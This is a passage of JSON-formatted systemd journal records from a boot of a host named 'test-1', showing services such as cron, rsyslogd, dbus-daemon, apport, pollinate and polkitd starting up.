"JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Network is Online.", "UNIT" : "network-online.target", "INVOCATION_ID" : "4d22c778885949648c8d9a9eb1486c98", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817876257" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d3;b=e2b08827b5804427b422c10c84f1567e;m=2a5cfba;t=5bd16df694f21;x=8bd8695305210409", "__REALTIME_TIMESTAMP" : "1615280818704161", "__MONOTONIC_TIMESTAMP" : "44421050", 
"_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "SYSLOG_IDENTIFIER" : "cron", "SYSLOG_PID" : "777", "_PID" : "777", "_COMM" : "cron", "_EXE" : "/usr/sbin/cron", "_CMDLINE" : "/usr/sbin/cron -f", "_SYSTEMD_CGROUP" : "/system.slice/cron.service", "_SYSTEMD_UNIT" : "cron.service", "_SYSTEMD_INVOCATION_ID" : "639ae62205e749a080eec1bd83ca7856", "MESSAGE" : "(CRON) INFO (Running @reboot jobs)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818107817" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d4;b=e2b08827b5804427b422c10c84f1567e;m=2a5d1e9;t=5bd16df695151;x=4db369ca3a42343e", "__REALTIME_TIMESTAMP" : "1615280818704721", "__MONOTONIC_TIMESTAMP" : "44421609", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Availability of block devices...", "UNIT" : "blk-availability.service", "INVOCATION_ID" : "cc006751d3f34c1a8252273d8ffc9cdf", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817886457" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d5;b=e2b08827b5804427b422c10c84f1567e;m=2a5d25e;t=5bd16df6951c5;x=371ffaea4bdf3918", "__REALTIME_TIMESTAMP" : 
"1615280818704837", "__MONOTONIC_TIMESTAMP" : "44421726", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "4", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "/usr/sbin/irqbalance", "MESSAGE" : "Balancing is ineffective on systems with a single cpu. Shutting down", "_PID" : "782", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818187602" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d6;b=e2b08827b5804427b422c10c84f1567e;m=2a5d5e2;t=5bd16df69554a;x=544700d31beb3d6a", "__REALTIME_TIMESTAMP" : "1615280818705738", "__MONOTONIC_TIMESTAMP" : "44422626", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Remote File Systems (Pre).", "UNIT" : "remote-fs-pre.target", "INVOCATION_ID" : "a4fe2657835244df874ebd49c332eb72", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817892939" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d7;b=e2b08827b5804427b422c10c84f1567e;m=2a5d657;t=5bd16df6955be;x=197acb999049c61f", "__REALTIME_TIMESTAMP" : "1615280818705854", "__MONOTONIC_TIMESTAMP" : "44422743", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" 
: "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "5", "SYSLOG_IDENTIFIER" : "rsyslogd", "MESSAGE" : "imuxsock: Acquired UNIX socket '/run/systemd/journal/syslog' (fd 3) from systemd. [v8.32.0]", "_PID" : "783", "_UID" : "102", "_GID" : "106", "_COMM" : "rsyslogd", "_EXE" : "/usr/sbin/rsyslogd", "_CMDLINE" : "/usr/sbin/rsyslogd -n", "_CAP_EFFECTIVE" : "0", "_SYSTEMD_CGROUP" : "/system.slice/rsyslog.service", "_SYSTEMD_UNIT" : "rsyslog.service", "_SYSTEMD_INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818301187" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d8;b=e2b08827b5804427b422c10c84f1567e;m=2a5dad1;t=5bd16df695a38;x=d1561caffd4754f8", "__REALTIME_TIMESTAMP" : "1615280818707000", "__MONOTONIC_TIMESTAMP" : "44423889", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Remote File Systems.", "UNIT" : "remote-fs.target", "INVOCATION_ID" : "a3e41334d93141efa0b57ed8ea417097", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817901028" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d9;b=e2b08827b5804427b422c10c84f1567e;m=2a5dbc7;t=5bd16df695b2f;x=d8bf11f61bdd7d75", "__REALTIME_TIMESTAMP" : "1615280818707247", "__MONOTONIC_TIMESTAMP" : "44424135", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", 
"_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "5", "SYSLOG_IDENTIFIER" : "rsyslogd", "_PID" : "783", "_UID" : "102", "_GID" : "106", "_COMM" : "rsyslogd", "_EXE" : "/usr/sbin/rsyslogd", "_CMDLINE" : "/usr/sbin/rsyslogd -n", "_CAP_EFFECTIVE" : "0", "_SYSTEMD_CGROUP" : "/system.slice/rsyslog.service", "_SYSTEMD_UNIT" : "rsyslog.service", "_SYSTEMD_INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "MESSAGE" : "rsyslogd's groupid changed to 106", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818301195" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2da;b=e2b08827b5804427b422c10c84f1567e;m=2a5df4a;t=5bd16df695eb1;x=389021366b3d61c8", "__REALTIME_TIMESTAMP" : "1615280818708145", "__MONOTONIC_TIMESTAMP" : "44425034", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Cloud-config availability.", "UNIT" : "cloud-config.target", "INVOCATION_ID" : "6c409315f2ba4f0f91c56317ab4bf1d9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817907846" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2db;b=e2b08827b5804427b422c10c84f1567e;m=2a5e441;t=5bd16df6963a9;x=274d74540f94b061", "__REALTIME_TIMESTAMP" : "1615280818709417", 
"__MONOTONIC_TIMESTAMP" : "44426305", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "5", "SYSLOG_IDENTIFIER" : "rsyslogd", "_PID" : "783", "_UID" : "102", "_GID" : "106", "_COMM" : "rsyslogd", "_EXE" : "/usr/sbin/rsyslogd", "_CMDLINE" : "/usr/sbin/rsyslogd -n", "_CAP_EFFECTIVE" : "0", "_SYSTEMD_CGROUP" : "/system.slice/rsyslog.service", "_SYSTEMD_UNIT" : "rsyslog.service", "_SYSTEMD_INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "MESSAGE" : "rsyslogd's userid changed to 102", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818301199" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2dc;b=e2b08827b5804427b422c10c84f1567e;m=2a5e5a5;t=5bd16df69650c;x=f921319dbb3c7da1", "__REALTIME_TIMESTAMP" : "1615280818709772", "__MONOTONIC_TIMESTAMP" : "44426661", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target System Initialization.", "UNIT" : "sysinit.target", "INVOCATION_ID" : "8489ce32bede4baeaa643a785a33c2a1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817915640" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2dd;b=e2b08827b5804427b422c10c84f1567e;m=2a5e61e;t=5bd16df696586;x=5c3f5f0781ff18d7", "__REALTIME_TIMESTAMP" : "1615280818709894", "__MONOTONIC_TIMESTAMP" : "44426782", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "5", "SYSLOG_IDENTIFIER" : "rsyslogd", "_PID" : "783", "_UID" : "102", "_GID" : "106", "_COMM" : "rsyslogd", "_EXE" : "/usr/sbin/rsyslogd", "_CMDLINE" : "/usr/sbin/rsyslogd -n", "_CAP_EFFECTIVE" : "0", "_SYSTEMD_CGROUP" : "/system.slice/rsyslog.service", "_SYSTEMD_UNIT" : "rsyslog.service", "_SYSTEMD_INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "MESSAGE" : " [origin software=\"rsyslogd\" swVersion=\"8.32.0\" x-pid=\"783\" x-info=\"http://www.rsyslog.com\"] start", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818301202" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2de;b=e2b08827b5804427b422c10c84f1567e;m=2a5e662;t=5bd16df6965c9;x=7cfa936fa298e955", "__REALTIME_TIMESTAMP" : "1615280818709961", "__MONOTONIC_TIMESTAMP" : "44426850", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "334cc89e89814f6d8ec9545baae5f735", "SYSLOG_IDENTIFIER" : "apport", "MESSAGE" : " * Starting automatic crash report generation: apport", "_PID" : "779", "_SYSTEMD_UNIT" : "apport.service", "_SYSTEMD_INVOCATION_ID" : "db150c2b16db4500a24a8de7446fee26" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2df;b=e2b08827b5804427b422c10c84f1567e;m=2a5e662;t=5bd16df6965c9;x=880efa6ed3af31bd", "__REALTIME_TIMESTAMP" : "1615280818709961", "__MONOTONIC_TIMESTAMP" : "44426850", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "stdout", "MESSAGE" : " ...done.", "_HOSTNAME" : "test-1", "_STREAM_ID" : "334cc89e89814f6d8ec9545baae5f735", "SYSLOG_IDENTIFIER" : "apport", "_PID" : "779", "_SYSTEMD_UNIT" : "apport.service", "_SYSTEMD_INVOCATION_ID" : "db150c2b16db4500a24a8de7446fee26" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e0;b=e2b08827b5804427b422c10c84f1567e;m=2a5e7fb;t=5bd16df696763;x=ca7481cda5aeaab1", "__REALTIME_TIMESTAMP" : "1615280818710371", "__MONOTONIC_TIMESTAMP" : "44427259", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on UUID daemon activation socket.", "UNIT" : "uuidd.socket", "INVOCATION_ID" : "5e99b229418347f591bf5e5be417071b", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817920686" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e1;b=e2b08827b5804427b422c10c84f1567e;m=2a5e899;t=5bd16df696800;x=7b7d3b6d6b045b24", "__REALTIME_TIMESTAMP" : "1615280818710528", "__MONOTONIC_TIMESTAMP" : "44427417", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "SYSLOG_IDENTIFIER" : "pollinate", "SYSLOG_PID" : "787", "MESSAGE" : "client sent 
challenge to [https://entropy.ubuntu.com/]", "_PID" : "812", "_UID" : "110", "_GID" : "1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818308095" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e2;b=e2b08827b5804427b422c10c84f1567e;m=2a5eb55;t=5bd16df696abc;x=2f156472965a9002", "__REALTIME_TIMESTAMP" : "1615280818711228", "__MONOTONIC_TIMESTAMP" : "44428117", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Socket activation for snappy daemon.", "UNIT" : "snapd.socket", "INVOCATION_ID" : "c6935bf9d91547fda67694f77a0fb293", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817929481" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e3;b=e2b08827b5804427b422c10c84f1567e;m=2a5ebba;t=5bd16df696b22;x=4966d0287197bbc5", "__REALTIME_TIMESTAMP" : "1615280818711330", "__MONOTONIC_TIMESTAMP" : "44428218", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "MESSAGE" : "[system] AppArmor D-Bus mediation is enabled", "_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system 
--address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818332886" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e4;b=e2b08827b5804427b422c10c84f1567e;m=2a5f395;t=5bd16df6972fc;x=cacb4ca893e9e258", "__REALTIME_TIMESTAMP" : "1615280818713340", "__MONOTONIC_TIMESTAMP" : "44430229", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Message of the Day.", "UNIT" : "motd-news.timer", "INVOCATION_ID" : "8863f0fafcad47bcad4c71fc9fa92ebd", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817940642" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e5;b=e2b08827b5804427b422c10c84f1567e;m=2a5f427;t=5bd16df69738f;x=de32ed590e437342", "__REALTIME_TIMESTAMP" : "1615280818713487", "__MONOTONIC_TIMESTAMP" : "44430375", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "_PID" : "790", "_UID" : "103", "_GID" 
: "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "MESSAGE" : "[system] Activating via systemd: service name='org.freedesktop.hostname1' unit='dbus-org.freedesktop.hostname1.service' requested by ':1.0' (uid=100 pid=600 comm=\"/lib/systemd/systemd-networkd \" label=\"unconfined\")", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818337092" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e6;b=e2b08827b5804427b422c10c84f1567e;m=2a5f587;t=5bd16df6974ee;x=d0573be2806b787a", "__REALTIME_TIMESTAMP" : "1615280818713838", "__MONOTONIC_TIMESTAMP" : "44430727", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on D-Bus System Message Bus Socket.", "UNIT" : "dbus.socket", "INVOCATION_ID" : "8b5e9356754c4f3794b0647122801a1a", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817945476" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e7;b=e2b08827b5804427b422c10c84f1567e;m=2a5f633;t=5bd16df69759b;x=d60627d30e6fb974", "__REALTIME_TIMESTAMP" : "1615280818714011", "__MONOTONIC_TIMESTAMP" : "44430899", 
"_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "MESSAGE" : "[system] Activating via systemd: service name='org.freedesktop.PolicyKit1' unit='polkit.service' requested by ':1.4' (uid=0 pid=786 comm=\"/usr/lib/accountsservice/accounts-daemon \" label=\"unconfined\")", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818366298" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e8;b=e2b08827b5804427b422c10c84f1567e;m=2a5f763;t=5bd16df6976cb;x=975c82288defccda", "__REALTIME_TIMESTAMP" : "1615280818714315", "__MONOTONIC_TIMESTAMP" : "44431203", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Daily apt download activities.", "UNIT" : 
"apt-daily.timer", "INVOCATION_ID" : "95548d7e62714445aee757aca3c79eb9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817951929" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e9;b=e2b08827b5804427b422c10c84f1567e;m=2a5f7ec;t=5bd16df697753;x=dba300a7ab8017ea", "__REALTIME_TIMESTAMP" : "1615280818714451", "__MONOTONIC_TIMESTAMP" : "44431340", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "polkitd", "SYSLOG_PID" : "823", "MESSAGE" : "started daemon version 0.105 using authority implementation `local' version `0.105'", "_PID" : "823", "_COMM" : "polkitd", "_EXE" : "/usr/lib/policykit-1/polkitd", "_CMDLINE" : "/usr/lib/policykit-1/polkitd --no-debug", "_SYSTEMD_CGROUP" : "/system.slice/polkit.service", "_SYSTEMD_UNIT" : "polkit.service", "_SYSTEMD_INVOCATION_ID" : 